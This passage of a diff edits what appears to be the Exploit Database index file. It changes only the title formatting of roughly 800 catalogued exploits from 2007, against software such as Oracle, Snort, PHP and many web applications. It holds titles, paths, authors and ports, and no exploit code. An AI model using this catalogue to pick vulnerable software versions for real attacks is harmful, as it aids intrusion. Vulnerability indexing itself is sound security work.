KUPW$WORKER.MAIN Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0 -3359,platforms/multiple/remote/3359.pl,"Oracle 10g KUPV$FT.ATTACH_JOB Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0 +3358,platforms/multiple/remote/3358.pl,"Oracle 10g - KUPW$WORKER.MAIN Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0 +3359,platforms/multiple/remote/3359.pl,"Oracle 10g - KUPV$FT.ATTACH_JOB Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0 3360,platforms/php/webapps/3360.txt,"FlashGameScript 1.5.4 - (index.php func) Remote File Inclusion",2007-02-22,JuMp-Er,php,webapps,0 3361,platforms/php/webapps/3361.txt,"eFiction 3.1.1 - (path_to_smf) Remote File Inclusion",2007-02-22,"ThE dE@Th",php,webapps,0 -3362,platforms/multiple/dos/3362.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Denial of Service",2007-02-23,"Trirat Puttaraksa",multiple,dos,0 +3362,platforms/multiple/dos/3362.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow Denial of Service",2007-02-23,"Trirat Puttaraksa",multiple,dos,0 3363,platforms/multiple/remote/3363.pl,"Oracle 9i/10g - DBMS_METADATA.GET_DDL SQL Injection",2007-02-23,bunker,multiple,remote,0 3364,platforms/windows/remote/3364.pl,"Oracle 9i/10g - ACTIVATE_SUBSCRIPTION SQL Injection",2007-02-23,bunker,windows,remote,0 3365,platforms/php/webapps/3365.txt,"FCRing 1.31 - (fcring.php s_fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 @@ -3057,7 +3057,7 @@ id,file,description,date,author,platform,type,port 3388,platforms/windows/remote/3388.pl,"3Com TFTP Service 2.0.1 - (Long Transporting Mode) Exploit (Perl)",2007-02-28,"Umesh Wanve",windows,remote,69 3389,platforms/linux/remote/3389.c,"madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow Exploit",2007-03-01,"Massimiliano Oldani",linux,remote,0 3390,platforms/asp/webapps/3390.txt,"Angel Lms 7.1 - (default.asp id) SQL Injection",2007-03-01,"Craig Heffner",asp,webapps,0 -3391,platforms/windows/remote/3391.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit",2007-03-01,"Trirat Puttaraksa",windows,remote,0 +3391,platforms/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow Exploit",2007-03-01,"Trirat Puttaraksa",windows,remote,0 3392,platforms/windows/dos/3392.html,"DivX Web Player 1.3.0 - (npdivx32.dll) Remote Denial of Service",2007-03-01,shinnai,windows,dos,0 3393,platforms/php/webapps/3393.php,"phpMyFAQ 1.6.7 - SQL Injection / Command Execution Exploit",2007-03-01,elgCrew,php,webapps,0 3394,platforms/multiple/dos/3394.php,"PHP 4 - Userland ZVAL Reference Counter Overflow Exploit PoC",2007-03-01,"Stefan Esser",multiple,dos,0 @@ -3073,7 +3073,7 @@ id,file,description,date,author,platform,type,port 3404,platforms/multiple/dos/3404.php,"PHP - wddx_deserialize() String Append Crash Exploit",2007-03-04,"Stefan Esser",multiple,dos,0 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS",2007-03-04,"Stefan Esser",multiple,remote,0 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Inclusion Exploit",2007-03-04,bd0rk,php,webapps,0 -3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15 / 1.4.0 - pre-auth Remote Denial of Service",2007-03-04,fbffff,multiple,dos,0 +3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15 / 1.4.0 - Pre-Auth Remote Denial of Service",2007-03-04,fbffff,multiple,dos,0 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - (subcat.php) SQL Injection",2007-03-04,ajann,php,webapps,0 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) SQL Injection",2007-03-04,ajann,php,webapps,0 3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) SQL Injection",2007-03-04,ajann,php,webapps,0 @@ -3116,7 +3116,7 @@ id,file,description,date,author,platform,type,port 3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 - (index.php ID) SQL Injection",2007-03-10,WiLdBoY,php,webapps,0 3450,platforms/php/webapps/3450.php,"NukeSentinel 2.5.06 - SQL Injection",2007-03-10,DarkFig,php,webapps,0 3451,platforms/windows/local/3451.c,"Oracle 10g - (PROCESS_DUP_HANDLE) Local Privilege Elevation (Win32)",2007-03-10,"Cesar Cerrudo",windows,local,0 -3452,platforms/multiple/remote/3452.php,"PHP 5.2.0 ext/filter FDF Post Filter Bypass Exploit",2007-03-10,"Stefan Esser",multiple,remote,0 +3452,platforms/multiple/remote/3452.php,"PHP 5.2.0 - ext/filter FDF Post Filter Bypass Exploit",2007-03-10,"Stefan Esser",multiple,remote,0 3453,platforms/windows/dos/3453.py,"Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption",2007-03-10,h07,windows,dos,0 3454,platforms/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 - (phgdir) Remote File Inclusion Exploit",2007-03-11,bd0rk,php,webapps,0 3455,platforms/php/webapps/3455.htm,"JobSitePro 1.0 - (search.php) SQL Injection",2007-03-11,ajann,php,webapps,0 @@ -3128,7 +3128,7 @@ id,file,description,date,author,platform,type,port 3461,platforms/windows/dos/3461.pl,"TFTP Server 1.3 - Remote Buffer Overflow Denial of Service",2007-03-12,"Umesh Wanve",windows,dos,0 3462,platforms/windows/remote/3462.cpp,"NewsReactor 20070220 - Article Grabbing Remote BoF Exploit (1)",2007-03-12,Marsu,windows,remote,0 3463,platforms/windows/remote/3463.cpp,"NewsReactor 20070220 - Article Grabbing Remote BoF Exploit (2)",2007-03-12,Marsu,windows,remote,0 -3464,platforms/windows/dos/3464.cpp,"News Bin Pro 4.32 Article Grabbing Remote Unicode BoF Exploit",2007-03-12,Marsu,windows,dos,0 +3464,platforms/windows/dos/3464.cpp,"News Bin Pro 4.32 - Article Grabbing Remote Unicode BoF Exploit",2007-03-12,Marsu,windows,dos,0 3465,platforms/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",2007-03-12,K-159,php,webapps,0 3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - (default.asp layout) SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0 3467,platforms/php/webapps/3467.txt,"GestArt beta 1 - (aide.php aide) Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0 @@ -3230,11 +3230,11 @@ id,file,description,date,author,platform,type,port 3566,platforms/multiple/dos/3566.pl,"Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service",2007-03-25,MADYNES,multiple,dos,0 3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu 1.07 - Remote File Inclusion Exploit",2007-03-25,"Cold Zero",php,webapps,0 3568,platforms/php/webapps/3568.txt,"Free Image Hosting 2.0 - (AD_BODY_TEMP) Remote File Inclusion",2007-03-25,Crackers_Child,php,webapps,0 -3569,platforms/php/webapps/3569.pl,"PBlang 4.66z Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0 +3569,platforms/php/webapps/3569.pl,"PBlang 4.66z - Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0 3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overlow Exploit",2007-03-25,niXel,windows,remote,21 3571,platforms/linux/local/3571.php,"PHP < 4.4.5 / 5.2.1 - _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 3572,platforms/linux/local/3572.php,"PHP < 4.4.5 / 5.2.1 - _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0 -3574,platforms/php/webapps/3574.pl,"PBlang 4.66z Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0 +3574,platforms/php/webapps/3574.pl,"PBlang 4.66z - Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0 3575,platforms/windows/remote/3575.cpp,"Frontbase 4.2.7 - Remote Buffer Overflow Exploit (windows)",2007-03-25,Heretic2,windows,remote,0 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC - Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0 3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,anonymous,windows,remote,0 @@ -3269,14 +3269,14 @@ id,file,description,date,author,platform,type,port 3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit",2007-03-29,shinnai,multiple,dos,0 3607,platforms/php/webapps/3607.txt,"Kaqoo Auction - (install_root) Multiple Remote File Inclusion",2007-03-29,"ThE dE@Th",php,webapps,0 3608,platforms/php/webapps/3608.txt,"Advanced Login 0.7 - (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0 -3609,platforms/linux/remote/3609.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (Linux)",2007-03-30,"Winny Thomas",linux,remote,0 +3609,platforms/linux/remote/3609.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow Exploit (Linux)",2007-03-30,"Winny Thomas",linux,remote,0 3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - (dvdtools.ocx) Remote Buffer Overflow Exploit",2007-03-30,"Umesh Wanve",windows,remote,0 3611,platforms/php/webapps/3611.txt,"JC URLshrink 1.3.1 - Remote Code Execution",2007-03-30,Dj7xpl,php,webapps,0 3612,platforms/php/webapps/3612.pl,"XOOPS Module Repository - (viewcat.php) SQL Injection",2007-03-30,ajann,php,webapps,0 3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - Remote File Inclusion",2007-03-30,bd0rk,php,webapps,0 3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 - (login.php table) Local File Inclusion",2007-03-30,GoLd_M,php,webapps,0 -3615,platforms/linux/remote/3615.c,"dproxy-nexgen Remote Root Buffer Overflow Exploit (Linux x86)",2007-03-30,mu-b,linux,remote,53 -3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143 +3615,platforms/linux/remote/3615.c,"dproxy-nexgen - Remote Root Buffer Overflow Exploit (Linux x86)",2007-03-30,mu-b,linux,remote,53 +3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Pre-Auth Remote Exploit",2007-03-31,muts,windows,remote,143 3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor (.ANI) Stack Overflow Exploit",2007-03-31,devcode,windows,local,0 3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 - (index.php) SQL Injection",2007-03-31,ajann,php,webapps,0 3619,platforms/php/webapps/3619.pl,"XOOPS Module Library - (viewcat.php) SQL Injection",2007-03-31,ajann,php,webapps,0 @@ -3287,7 +3287,7 @@ id,file,description,date,author,platform,type,port 3624,platforms/php/webapps/3624.txt,"BT-sondage 1.12 - (gestion_sondage.php) Remote File Inclusion",2007-04-01,Crackers_Child,php,webapps,0 3625,platforms/php/webapps/3625.pl,"XOOPS Module Tiny Event 1.01 - (id) SQL Injection",2007-04-01,ajann,php,webapps,0 3626,platforms/php/webapps/3626.pl,"XOOPS Module Kshop 1.17 - (id) SQL Injection",2007-04-01,ajann,php,webapps,0 -3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server 8.20 IMAPD Remote Buffer Overflow Exploit",2007-04-01,Heretic2,windows,remote,143 +3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow Exploit",2007-04-01,Heretic2,windows,remote,143 3628,platforms/php/webapps/3628.txt,"CWB PRO 1.5 - (INCLUDE_PATH) Remote File Inclusion",2007-04-01,GoLd_M,php,webapps,0 3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail 1.1 - (camid) SQL Injection",2007-04-01,ajann,php,webapps,0 3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser 0.92 - (genre.php) BLIND SQL Injection",2007-04-01,ajann,php,webapps,0 @@ -3306,8 +3306,8 @@ id,file,description,date,author,platform,type,port 3646,platforms/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 - (print.php) SQL Injection",2007-04-02,ajann,php,webapps,0 3647,platforms/windows/local/3647.c,"Microsoft Windows - Animated Cursor (.ANI) Local Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 3648,platforms/windows/local/3648.c,"IrfanView 3.99 - (.ANI) Local Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 -3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 -3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - POST-AUTH Remote Buffer Overflow Exploit (2.2)",2007-04-02,Heretic2,windows,remote,0 +3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 - Server Manager Local Site Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 +3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - Post-Auth Remote Buffer Overflow Exploit (2.2)",2007-04-02,Heretic2,windows,remote,0 3651,platforms/windows/remote/3651.txt,"Microsoft Windows - Animated Cursor (.ANI) Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0 3652,platforms/windows/local/3652.c,"Microsoft Windows - Animated Cursor (.ANI) Overflow Exploit (Hardware DEP)",2007-04-03,devcode,windows,local,0 3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution Exploit",2007-04-03,DarkFig,php,webapps,0 @@ -3354,7 +3354,7 @@ id,file,description,date,author,platform,type,port 3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor (.ANI) Local Overflow Exploit",2007-04-09,"Breno Silva Pinto",windows,local,0 3696,platforms/php/webapps/3696.txt,"Pathos CMS 0.92-2 - (warn.php) Remote File Inclusion",2007-04-09,kezzap66345,php,webapps,0 3697,platforms/php/webapps/3697.txt,"HIOX GUEST BOOK (HGB) 4.0 - Remote Code Execution",2007-04-10,Dj7xpl,php,webapps,0 -3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 Kadmind Remote Root Buffer Overflow",2007-04-10,c0ntex,linux,remote,0 +3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Remote Root Buffer Overflow",2007-04-10,c0ntex,linux,remote,0 3699,platforms/php/webapps/3699.txt,"phpGalleryScript 1.0 - (init.gallery.php include_class) Remote File Inclusion",2007-04-10,anonymous,php,webapps,0 3700,platforms/php/webapps/3700.txt,"Weatimages 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,php,webapps,0 3701,platforms/php/webapps/3701.txt,"Crea-Book 1.0 - Admin Access Bypass / DB Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0 @@ -3371,7 +3371,7 @@ id,file,description,date,author,platform,type,port 3712,platforms/php/webapps/3712.txt,"Mambo Module Weather - (absolute_path) Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 3713,platforms/php/webapps/3713.txt,"Mambo Module Calendar (Agenda) 1.5.5 - Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 3714,platforms/php/webapps/3714.txt,"joomla component mosmedia 1.0.8 - Remote File Inclusion",2007-04-11,GoLd_M,php,webapps,0 -3715,platforms/windows/dos/3715.py,"Sami HTTP Server 2.0.1 POST Request Denial of Service",2007-04-12,shinnai,windows,dos,0 +3715,platforms/windows/dos/3715.py,"Sami HTTP Server 2.0.1 - POST Request Denial of Service",2007-04-12,shinnai,windows,dos,0 3716,platforms/php/webapps/3716.pl,"mxBB Module MX Shotcast 1.0 RC2 - (getinfo1.php) Remote File Inclusion Exploit",2007-04-12,bd0rk,php,webapps,0 3717,platforms/php/webapps/3717.txt,"WebKalk2 1.9.0 - (absolute_path) Remote File Inclusion",2007-04-12,GoLd_M,php,webapps,0 3718,platforms/php/webapps/3718.txt,"RicarGBooK 1.2.1 - (header.php lang) Local File Inclusion",2007-04-12,Dj7xpl,php,webapps,0 @@ -3424,7 +3424,7 @@ id,file,description,date,author,platform,type,port 3766,platforms/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion",2007-04-19,bd0rk,php,webapps,0 3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 - (error.asp id) SQL Injection",2007-04-19,CyberGhost,asp,webapps,0 3768,platforms/windows/dos/3768.pl,"Winamp 5.3 - (.WMV) Remote Denial of Service",2007-04-19,WiLdBoY,windows,dos,0 -3769,platforms/linux/dos/3769.c,"eXtremail 2.1.1 DNS Parsing Bugs Remote Exploit PoC",2007-04-20,mu-b,linux,dos,0 +3769,platforms/linux/dos/3769.c,"eXtremail 2.1.1 - DNS Parsing Bugs Remote Exploit PoC",2007-04-20,mu-b,linux,dos,0 3770,platforms/windows/dos/3770.pl,"Foxit Reader 2.0 - (PDF) Remote Denial of Service",2007-04-20,n00b,windows,dos,0 3771,platforms/php/webapps/3771.txt,"Supasite 1.23b - Multiple Remote File Inclusion",2007-04-21,GoLd_M,php,webapps,0 3772,platforms/windows/local/3772.c,"Photofiltre Studio 8.1.1 - (.TIF) Local Buffer Overflow Exploit",2007-04-21,Marsu,windows,local,0 @@ -3535,8 +3535,8 @@ id,file,description,date,author,platform,type,port 3877,platforms/windows/remote/3877.html,"IncrediMail IMMenuShellExt - ActiveX Control Buffer Overflow Exploit",2007-05-08,"Umesh Wanve",windows,remote,0 3878,platforms/php/webapps/3878.txt,"Miplex2 - (SmartyFU.class.php) Remote File Inclusion",2007-05-08,"ThE TiGeR",php,webapps,0 3879,platforms/php/webapps/3879.htm,"phpMyPortal 3.0.0 RC3 - GLOBALS[CHEMINMODULES] Remote File Inclusion Exploit",2007-05-09,GoLd_M,php,webapps,0 -3880,platforms/windows/remote/3880.html,"Sienzo Digital Music Mentor 2.6.0.4 SetEvalExpiryDate SEH Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 -3881,platforms/windows/remote/3881.html,"Sienzo Digital Music Mentor 2.6.0.4 SetEvalExpiryDate EIP Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 +3880,platforms/windows/remote/3880.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate SEH Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 +3881,platforms/windows/remote/3881.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate EIP Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 3882,platforms/windows/remote/3882.html,"BarCodeWiz ActiveX Control 2.52 - (BarcodeWiz.dll) SEH Overwrite Exploit",2007-05-09,"Parveen Vashishtha",windows,remote,0 3883,platforms/windows/dos/3883.html,"BarCodeWiz ActiveX Control 2.0 - (BarcodeWiz.dll) Remote BoF PoC",2007-05-09,shinnai,windows,dos,0 3884,platforms/php/webapps/3884.txt,"aForum 1.32 - (CommonAbsDir) Remote File Inclusion",2007-05-09,"ThE TiGeR",php,webapps,0 @@ -3587,13 +3587,13 @@ id,file,description,date,author,platform,type,port 3931,platforms/php/webapps/3931.htm,"XOOPS Module resmanager 1.21 - Blind SQL Injection",2007-05-15,ajann,php,webapps,0 3932,platforms/php/webapps/3932.pl,"XOOPS Module Glossarie 1.7 - (sid) SQL Injection",2007-05-15,ajann,php,webapps,0 3933,platforms/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 - (index.php) SQL Injection",2007-05-15,ajann,php,webapps,0 -3934,platforms/windows/remote/3934.py,"Eudora 7.1 SMTP ResponseRemote Remote Buffer Overflow Exploit",2007-05-15,h07,windows,remote,0 +3934,platforms/windows/remote/3934.py,"Eudora 7.1 - SMTP ResponseRemote Remote Buffer Overflow Exploit",2007-05-15,h07,windows,remote,0 3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 - custom_vars.php Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps,0 3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - (tr) Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0 3937,platforms/windows/dos/3937.html,"PrecisionID Barcode ActiveX 1.9 - Remote Denial of Service",2007-05-16,shinnai,windows,dos,0 3938,platforms/windows/remote/3938.html,"PrecisionID Barcode ActiveX 1.9 - Remote Arbitrary File Overwrite Exploit",2007-05-16,shinnai,windows,remote,0 -3939,platforms/windows/dos/3939.py,"CA BrightStor Backup 11.5.2.0 caloggderd.exe Denial of Service",2007-05-16,Shirkdog,windows,dos,0 -3940,platforms/windows/dos/3940.py,"CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service",2007-05-16,Shirkdog,windows,dos,0 +3939,platforms/windows/dos/3939.py,"CA BrightStor Backup 11.5.2.0 - caloggderd.exe Denial of Service",2007-05-16,Shirkdog,windows,dos,0 +3940,platforms/windows/dos/3940.py,"CA BrightStor Backup 11.5.2.0 - Mediasvr.exe Denial of Service",2007-05-16,Shirkdog,windows,dos,0 3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0 3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - (print.php newnr) SQL Injection",2007-05-16,Silentz,php,webapps,0 3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - (question.php questionref) SQL Injection",2007-05-16,Silentz,php,webapps,0 @@ -3603,7 +3603,7 @@ id,file,description,date,author,platform,type,port 3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion",2007-05-17,"Alkomandoz Hacker",php,webapps,0 3948,platforms/php/webapps/3948.txt,"Libstats 1.0.3 - (template_csv.php) Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0 3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - (index.php lang) Local File Inclusion",2007-05-18,MurderSkillz,php,webapps,0 -3950,platforms/windows/remote/3950.html,"LeadTools JPEG 2000 COM Object Remote Stack Overflow Exploit",2007-05-18,shinnai,windows,remote,0 +3950,platforms/windows/remote/3950.html,"LeadTools JPEG 2000 - COM Object Remote Stack Overflow Exploit",2007-05-18,shinnai,windows,remote,0 3951,platforms/windows/remote/3951.html,"LeadTools Thumbnail Browser Control - (lttmb14E.ocx) Remote BoF Exploit",2007-05-18,shinnai,windows,remote,0 3952,platforms/windows/remote/3952.html,"LeadTools Raster Thumbnail Object Library - (LTRTM14e.DLL) BoF Exploit",2007-05-18,shinnai,windows,remote,0 3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 - (root) Remote File Inclusion",2007-05-19,"Mehmet Ince",php,webapps,0 @@ -3635,11 +3635,11 @@ id,file,description,date,author,platform,type,port 3979,platforms/windows/dos/3979.html,"LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow PoC",2007-05-24,shinnai,windows,dos,0 3980,platforms/php/webapps/3980.pl,"Dokeos 1.6.5 - (courseLog.php scormcontopen) SQL Injection",2007-05-24,Silentz,php,webapps,0 3981,platforms/php/webapps/3981.php,"cpCommerce 1.1.0 - (category.php id_category) SQL Injection",2007-05-24,Kacper,php,webapps,0 -3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP Service Control Remote BoF Exploit",2007-05-24,rgod,windows,remote,0 +3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP - Service Control Remote BoF Exploit",2007-05-24,rgod,windows,remote,0 3983,platforms/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusion",2007-05-24,DeltahackingTEAM,php,webapps,0 -3984,platforms/windows/remote/3984.html,"Dart Communications PowerTCP ZIP Compression Remote BoF Exploit",2007-05-25,rgod,windows,remote,0 +3984,platforms/windows/remote/3984.html,"Dart Communications PowerTCP - ZIP Compression Remote BoF Exploit",2007-05-25,rgod,windows,remote,0 3985,platforms/osx/local/3985.txt,"Mac OS X 10.4.8 - pppd Plugin Loading Privilege Escalation Exploit",2007-05-25,qaaz,osx,local,0 -3986,platforms/windows/dos/3986.html,"LeadTools Raster Dialog File_D Object Remote Buffer Overflow Exploit",2007-05-25,shinnai,windows,dos,0 +3986,platforms/windows/dos/3986.html,"LeadTools Raster - Dialog File_D Object Remote Buffer Overflow Exploit",2007-05-25,shinnai,windows,dos,0 3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 - (class.php root) Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0 3988,platforms/php/webapps/3988.php,"gCards 1.46 - SQL Injection/Remote Code Execution Exploit",2007-05-25,Silentz,php,webapps,0 3989,platforms/php/webapps/3989.pl,"My Little Forum 1.7 - (user.php id) SQL Injection",2007-05-25,Silentz,php,webapps,0 @@ -3679,7 +3679,7 @@ id,file,description,date,author,platform,type,port 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional - .PLF file Buffer Overflow Exploit",2007-06-02,n00b,windows,local,0 4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - RFI/LFI Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0 4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) SQL Injection",2007-06-03,Kacper,php,webapps,0 -4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080 +4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Pre-Auth Remote Exploit",2007-06-03,muts,windows,remote,8080 4028,platforms/linux/local/4028.txt,"Screen 4.0.3 (OpenBSD) - Local Authentication Bypass",2008-06-18,Rembrandt,linux,local,0 4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution Exploit",2007-06-04,Silentz,php,webapps,0 4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - (listmembers.php rank) SQL Injection",2007-06-04,Silentz,php,webapps,0 @@ -3688,7 +3688,7 @@ id,file,description,date,author,platform,type,port 4033,platforms/windows/dos/4033.rb,"SNMPc 7.0.18 - Remote Denial of Service (Metasploit)",2007-06-04,"En Douli",windows,dos,0 4034,platforms/php/webapps/4034.txt,"Kravchuk letter script 1.0 - (scdir) Remote File Inclusion",2007-06-05,"Mehmet Ince",php,webapps,0 4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 - (index.php epi) SQL Injection",2007-06-05,s0cratex,php,webapps,0 -4036,platforms/php/webapps/4036.php,"PBLang 4.67.16.a Remote Code Execution Exploit",2007-06-06,Silentz,php,webapps,0 +4036,platforms/php/webapps/4036.php,"PBLang 4.67.16.a - Remote Code Execution Exploit",2007-06-06,Silentz,php,webapps,0 4037,platforms/php/webapps/4037.pl,"Comicsense 0.2 - (index.php epi) SQL Injection",2007-06-06,Silentz,php,webapps,0 4038,platforms/multiple/dos/4038.pl,"DRDoS - Distributed Reflection Denial of Service",2007-06-06,whoppix,multiple,dos,0 4039,platforms/php/webapps/4039.txt,"WordPress 2.2 - (xmlrpc.php) SQL Injection",2007-06-06,Slappter,php,webapps,0 @@ -3784,7 +3784,7 @@ id,file,description,date,author,platform,type,port 4134,platforms/php/webapps/4134.txt,"Easybe 1-2-3 Music Store - (process.php) SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 4135,platforms/php/webapps/4135.pl,"phpEventCalendar 0.2.3 - (eventdisplay.php) SQL Injection",2007-07-01,Iron,php,webapps,0 4136,platforms/php/webapps/4136.txt,"YouTube Clone Script - (msg.php id) SQL Injection",2007-07-02,t0pP8uZz,php,webapps,0 -4137,platforms/windows/dos/4137.html,"HP Instant Support (Driver Check) Remote Buffer Overflow Exploit PoC",2007-07-02,shinnai,windows,dos,0 +4137,platforms/windows/dos/4137.html,"HP Instant Support - (Driver Check) Remote Buffer Overflow Exploit PoC",2007-07-02,shinnai,windows,dos,0 4138,platforms/php/webapps/4138.txt,"AV Arcade 2.1b - (index.php id) SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 4139,platforms/php/webapps/4139.txt,"PHPDirector 0.21 - (videos.php id) SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 4140,platforms/php/webapps/4140.txt,"vbzoom 1.x - (forum.php MainID) SQL Injection",2007-07-02,"Cold Zero",php,webapps,0 @@ -3804,7 +3804,7 @@ id,file,description,date,author,platform,type,port 4154,platforms/php/webapps/4154.txt,"eMeeting Online Dating Software 5.2 - SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 4155,platforms/windows/remote/4155.html,"HP Digital Imaging (hpqvwocx.dll 2.1.0.556) - SaveToFile() Exploit",2007-07-06,shinnai,windows,remote,0 4156,platforms/php/webapps/4156.txt,"limesurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0 -4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 WebTools Remote SEH overwrite Exploit",2007-07-07,Heretic2,windows,remote,9999 +4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote SEH overwrite Exploit",2007-07-07,Heretic2,windows,remote,9999 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote BoF Exploit",2007-07-07,nitr0us,windows,remote,0 